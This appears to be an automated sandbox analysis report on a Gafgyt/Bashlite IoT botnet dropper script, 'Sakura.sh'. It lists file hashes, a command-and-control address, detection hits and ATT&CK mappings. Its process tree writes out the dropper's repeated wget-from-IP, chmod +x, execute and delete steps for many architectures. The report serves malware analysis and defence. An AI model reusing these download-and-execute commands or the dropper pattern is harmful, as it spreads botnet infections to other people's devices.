gafgyt | 6e2512f6f74cc6228d5925dda1324b5a81c7e70fa8505f1f4cee5140b1fc5380

Analysis

max time kernel
16s
max time network
17s
platform
debian-9_mipsel
resource
debian9-mipsel-20240729-en
resource tags

arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
09/03/2025, 15:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Sakura.sh
Size

2KB
MD5

57f1041fd8cdcbb4c369bb68bfd99db8
SHA1

15df867f11dbdfc5500cd0b4a750ab5b0f861a92
SHA256

6e2512f6f74cc6228d5925dda1324b5a81c7e70fa8505f1f4cee5140b1fc5380
SHA512

fe018d3aa481c685d6e6b30c982050d33f8901dbe5054ed2d0fa8035353441731fc9255345c454e505492ea075936350bdb33303cdc2d83df2f9f55b80665a56

Score

10^/10

gafgyt botnet defense_evasion

Malware Config

Extracted

Family

gafgyt

205.185.115.242:12345

Signatures

Detected Gafgyt variant 11 IoCs

resource	yara_rule
behavioral4/files/fstream-1.dat	family_gafgyt
behavioral4/files/fstream-2.dat	family_gafgyt
behavioral4/files/fstream-3.dat	family_gafgyt
behavioral4/files/fstream-4.dat	family_gafgyt
behavioral4/files/fstream-5.dat	family_gafgyt
behavioral4/files/fstream-6.dat	family_gafgyt
behavioral4/files/fstream-7.dat	family_gafgyt
behavioral4/files/fstream-8.dat	family_gafgyt
behavioral4/files/fstream-9.dat	family_gafgyt
behavioral4/files/fstream-10.dat	family_gafgyt
behavioral4/files/fstream-13.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
772	chmod
777	chmod
787	chmod
792	chmod
804	chmod
831	chmod
860	chmod
782	chmod
797	chmod
817	chmod
845	chmod
872	chmod
758	chmod

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/m-i.p-s.Sakura	760	Sakura.sh
/tmp/m-p.s-l.Sakura	773	Sakura.sh
/tmp/s-h.4-.Sakura	778	Sakura.sh
/tmp/x-8.6-.Sakura	783	Sakura.sh
/tmp/a-r.m-6.Sakura	788	Sakura.sh
/tmp/x-3.2-.Sakura	793	Sakura.sh
/tmp/a-r.m-7.Sakura	798	Sakura.sh
/tmp/p-p.c-.Sakura	806	Sakura.sh
/tmp/i-5.8-6.Sakura	819	Sakura.sh
/tmp/m-6.8-k.Sakura	833	Sakura.sh
/tmp/p-p.c-.Sakura	846	Sakura.sh
/tmp/a-r.m-4.Sakura	862	Sakura.sh
/tmp/a-r.m-5.Sakura	873	Sakura.sh

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/p-p.c-.Sakura	wget
File opened for modification	/tmp/a-r.m-5.Sakura	wget
File opened for modification	/tmp/m-p.s-l.Sakura	wget
File opened for modification	/tmp/x-8.6-.Sakura	wget
File opened for modification	/tmp/a-r.m-6.Sakura	wget
File opened for modification	/tmp/x-3.2-.Sakura	wget
File opened for modification	/tmp/i-5.8-6.Sakura	wget
File opened for modification	/tmp/m-6.8-k.Sakura	wget
File opened for modification	/tmp/p-p.c-.Sakura	wget
File opened for modification	/tmp/a-r.m-4.Sakura	wget
File opened for modification	/tmp/m-i.p-s.Sakura	wget
File opened for modification	/tmp/s-h.4-.Sakura	wget
File opened for modification	/tmp/a-r.m-7.Sakura	wget

/tmp/Sakura.sh
/tmp/Sakura.sh
1⤵
- Executes dropped EXE
PID:739
- /usr/bin/wget
  wget http://45.135.194.28/m-i.p-s.Sakura
  2⤵
  - Writes file to tmp directory
  PID:742
- /bin/chmod
  chmod +x m-i.p-s.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:758
- /tmp/m-i.p-s.Sakura
  ./m-i.p-s.Sakura
  2⤵
  PID:760
- /bin/rm
  rm -rf m-i.p-s.Sakura
  2⤵
  PID:763
- /usr/bin/wget
  wget http://45.135.194.28/m-p.s-l.Sakura
  2⤵
  - Writes file to tmp directory
  PID:765
- /bin/chmod
  chmod +x m-p.s-l.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:772
- /tmp/m-p.s-l.Sakura
  ./m-p.s-l.Sakura
  2⤵
  PID:773
- /bin/rm
  rm -rf m-p.s-l.Sakura
  2⤵
  PID:774
- /usr/bin/wget
  wget http://45.135.194.28/s-h.4-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:775
- /bin/chmod
  chmod +x s-h.4-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:777
- /tmp/s-h.4-.Sakura
  ./s-h.4-.Sakura
  2⤵
  PID:778
- /bin/rm
  rm -rf s-h.4-.Sakura
  2⤵
  PID:780
- /usr/bin/wget
  wget http://45.135.194.28/x-8.6-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:781
- /bin/chmod
  chmod +x x-8.6-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:782
- /tmp/x-8.6-.Sakura
  ./x-8.6-.Sakura
  2⤵
  PID:783
- /bin/rm
  rm -rf x-8.6-.Sakura
  2⤵
  PID:785
- /usr/bin/wget
  wget http://45.135.194.28/a-r.m-6.Sakura
  2⤵
  - Writes file to tmp directory
  PID:786
- /bin/chmod
  chmod +x a-r.m-6.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:787
- /tmp/a-r.m-6.Sakura
  ./a-r.m-6.Sakura
  2⤵
  PID:788
- /bin/rm
  rm -rf a-r.m-6.Sakura
  2⤵
  PID:790
- /usr/bin/wget
  wget http://45.135.194.28/x-3.2-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:791
- /bin/chmod
  chmod +x x-3.2-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:792
- /tmp/x-3.2-.Sakura
  ./x-3.2-.Sakura
  2⤵
  PID:793
- /bin/rm
  rm -rf x-3.2-.Sakura
  2⤵
  PID:795
- /usr/bin/wget
  wget http://45.135.194.28/a-r.m-7.Sakura
  2⤵
  - Writes file to tmp directory
  PID:796
- /bin/chmod
  chmod +x a-r.m-7.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:797
- /tmp/a-r.m-7.Sakura
  ./a-r.m-7.Sakura
  2⤵
  PID:798
- /bin/rm
  rm -rf a-r.m-7.Sakura
  2⤵
  PID:800
- /usr/bin/wget
  wget http://45.135.194.28/p-p.c-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:801
- /bin/chmod
  chmod +x p-p.c-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:804
- /tmp/p-p.c-.Sakura
  ./p-p.c-.Sakura
  2⤵
  PID:806
- /bin/rm
  rm -rf p-p.c-.Sakura
  2⤵
  PID:809
- /usr/bin/wget
  wget http://45.135.194.28/i-5.8-6.Sakura
  2⤵
  - Writes file to tmp directory
  PID:810
- /bin/chmod
  chmod +x i-5.8-6.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:817
- /tmp/i-5.8-6.Sakura
  ./i-5.8-6.Sakura
  2⤵
  PID:819
- /bin/rm
  rm -rf i-5.8-6.Sakura
  2⤵
  PID:822
- /usr/bin/wget
  wget http://45.135.194.28/m-6.8-k.Sakura
  2⤵
  - Writes file to tmp directory
  PID:823
- /bin/chmod
  chmod +x m-6.8-k.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:831
- /tmp/m-6.8-k.Sakura
  ./m-6.8-k.Sakura
  2⤵
  PID:833
- /bin/rm
  rm -rf m-6.8-k.Sakura
  2⤵
  PID:836
- /usr/bin/wget
  wget http://45.135.194.28/p-p.c-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:837
- /bin/chmod
  chmod +x p-p.c-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:845
- /tmp/p-p.c-.Sakura
  ./p-p.c-.Sakura
  2⤵
  PID:846
- /bin/rm
  rm -rf p-p.c-.Sakura
  2⤵
  PID:849
- /usr/bin/wget
  wget http://45.135.194.28/a-r.m-4.Sakura
  2⤵
  - Writes file to tmp directory
  PID:850
- /bin/chmod
  chmod +x a-r.m-4.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:860
- /tmp/a-r.m-4.Sakura
  ./a-r.m-4.Sakura
  2⤵
  PID:862
- /bin/rm
  rm -rf a-r.m-4.Sakura
  2⤵
  PID:865
- /usr/bin/wget
  wget http://45.135.194.28/a-r.m-5.Sakura
  2⤵
  - Writes file to tmp directory
  PID:866
- /bin/chmod
  chmod +x a-r.m-5.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:872
- /tmp/a-r.m-5.Sakura
  ./a-r.m-5.Sakura
  2⤵
  PID:873
- /bin/rm
  rm -rf a-r.m-5.Sakura
  2⤵
  PID:875

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/a-r.m-5.Sakura

Filesize
99KB

MD5
67b1d4f29b5f3d4a34ca7fa7c6217505

SHA1
4877a85abdce3e675af243eaaa8fcc3463090a02

SHA256
8beaa53cafbe16efa74a6197ff61ba31a5c4917bb4d7fc08a617bb2f68ddadca

SHA512
c6dae24f9b3299f3c9534b19014bd9aaae71c57b9ef37517613fdfee44c48eebd7660a4f5394adaea8edbfec53aac5d508e67468a0372b1bb8f7092315096e2a

Download Submit
/tmp/a-r.m-6.Sakura

Filesize
118KB

MD5
425fab3d1076fc2e2c7a2fac555bd1a2

SHA1
cacd4c05abc4653c31e0a251e38bc144c7bb98c5

SHA256
b8879c45463335061316f6ca8d318e0405ac5d099e973ba9fa92d17a6a618cd4

SHA512
85922eb15be54a98e112a73de4a92b70bdd12703374d29383bde4913633edf4ec7cf2f88282976bc374f5b8a2bbce0ff039974159b0883d188e33ccec843c4f5

Download Submit
/tmp/a-r.m-7.Sakura

Filesize
91KB

MD5
446fd508a7793319823d9ab6a49f763a

SHA1
b5dd286ca11520a4af758d7644e48e7973ebb56e

SHA256
0827430f0fac66f032a6b7d7683520a53bcae922c0604d9fd2443d8985224d9d

SHA512
0e4d746b6f479d427b9f21fc702a68191d7633592823b9a5efc5e0c655dbeeb25a9682599b9d11538ba42099d53b403a28bc5f1d6d427c1627c7896710c07321

Download Submit
/tmp/i-5.8-6.Sakura

Filesize
96KB

MD5
b17cb812f0f9f4f165aafb88d3095c1d

SHA1
07973fdd4580ded468e718dd9f760cf3ebd30546

SHA256
becd8adb426f1b76dc3fc48adb19d7928cb007f6ae06fe857d468b86cf587d9d

SHA512
3c40ef6ec0337d37f1bb21982c3d1e7e9b206f0cbb588c85260b0d94be1cc23c1a23cbb58487b624653ee2f01bf870b7737436f6b34f1d420a4b1b1b25cd8ef0

Download Submit
/tmp/m-6.8-k.Sakura

Filesize
157KB

MD5
d3973e25e6731b45942245fd94e5122a

SHA1
9101514baa18a37d164043c12deacf393d955bee

SHA256
14294bec7f615aefc954854c1ac6ceba550b8f5a654be3f9c05ad511f17bad0d

SHA512
44a3bc3e97013d4d8b806905d8abc916c56055484a13798b5982bd288286c8a319bab51dfd84e6dbfa1d176e0e0f90e1939aae48162c1829b79996d460718401

Download Submit
/tmp/m-i.p-s.Sakura

Filesize
123KB

MD5
14d080085e07550462ad99c044f9a528

SHA1
8eb09b4d78b8f089198df54c1cbcb9b0b94c6065

SHA256
fc7c954dbcc44830d87599ce3d0be7ef947bd3b59ef1d3d22fef2d107a043f12

SHA512
7028652e0c50370014bb3377a1a0c201d77fcd541de59265df3729c5c74b1a18ba426e023493438fd8a56bddccc103f246432e33e02b47dd5f2e862ed4449fd8

Download Submit
/tmp/m-p.s-l.Sakura

Filesize
123KB

MD5
f3713f7bb1b9f97832937880a8b5d31f

SHA1
65f2a9b5e56147042eed7ecf36ad08cbfa634a9d

SHA256
0d343654edf5f6082a5eaba1b7812f3ff4822a3fc9a0b0da312ac1bfb93e877b

SHA512
6ecac517f25818a82b5a7b7b50275c183b6adcd12b55e7d71b3fc45f6e7f6cc1cc40e9f61ee71de4a4f371e67373e855cfffa9a640392d322975682dede87978

Download Submit
/tmp/p-p.c-.Sakura

Filesize
106KB

MD5
81673cf3472baef55f1fa7aae2cdfb50

SHA1
1aa9bb2cdab6acaa3d4ab05653c1580d038e4b59

SHA256
782865aa08c1ad4ce7f360dc1d7bf32016515bd62f14fffc070f420046b38fac

SHA512
ec2c4b67572d9f174c8d2a11775908e05706c7e83ec946fac5dc2a7339723b4f1becb5ad19e0645c0f87db055b78232ce42008f0567610eda503d385d2990f70

Download Submit
/tmp/s-h.4-.Sakura

Filesize
86KB

MD5
0950c8ec59f79344ebdf0a95c274e243

SHA1
5ea0e8a96792b6693f8beaffc484328ff5292ebe

SHA256
ed326f0a7e07ee9cd9fc472d08b0d1b4b8bd08075eaa7b53a1c7a55c50dcfda4

SHA512
550b656c0d30ae7c59fd14d084eda037c97b38158f4f35399e7a372d99f9f5aaa5c7b5944da48bba45730f2e0e559ef7fda9bed5da7342ecb904ceff1fb8f130

Download Submit
/tmp/x-3.2-.Sakura

Filesize
83KB

MD5
5facc88ccf81fbb0b6e7172a766f52c3

SHA1
2e6b245c95dcbe814ca6d5a2bf6bff90e0d06b6d

SHA256
d496b895b3fd172325ffc99764043fd07e3275eaa29ef1b5adf3e86a7e173c21

SHA512
225e4ec58b132ef264bce9adff18a72bbebf8b9d7d02869f1146c07ad3d45b17b83f177de34a4482da63a4767f7a963496be5e806a9536a020436359fdc6a76b

Download Submit
/tmp/x-8.6-.Sakura

Filesize
92KB

MD5
bc2f752972da249f2baa04d4b3ee7883

SHA1
5eeff86de4abc7a4e3c191ca48b520c9e43e925d

SHA256
f310a921f4f8472f56e7d1cfea3dbf594e69015ff64f8c10b31caaaa15509ddb

SHA512
644f0e997b94105be9d70b2981476b5fb184c4c16acc32275c13cf8add64f27fef8593a5b93d51698d3c592cbcf26b7363ceb87897c29ba35665bdb1262c27f1

Download Submit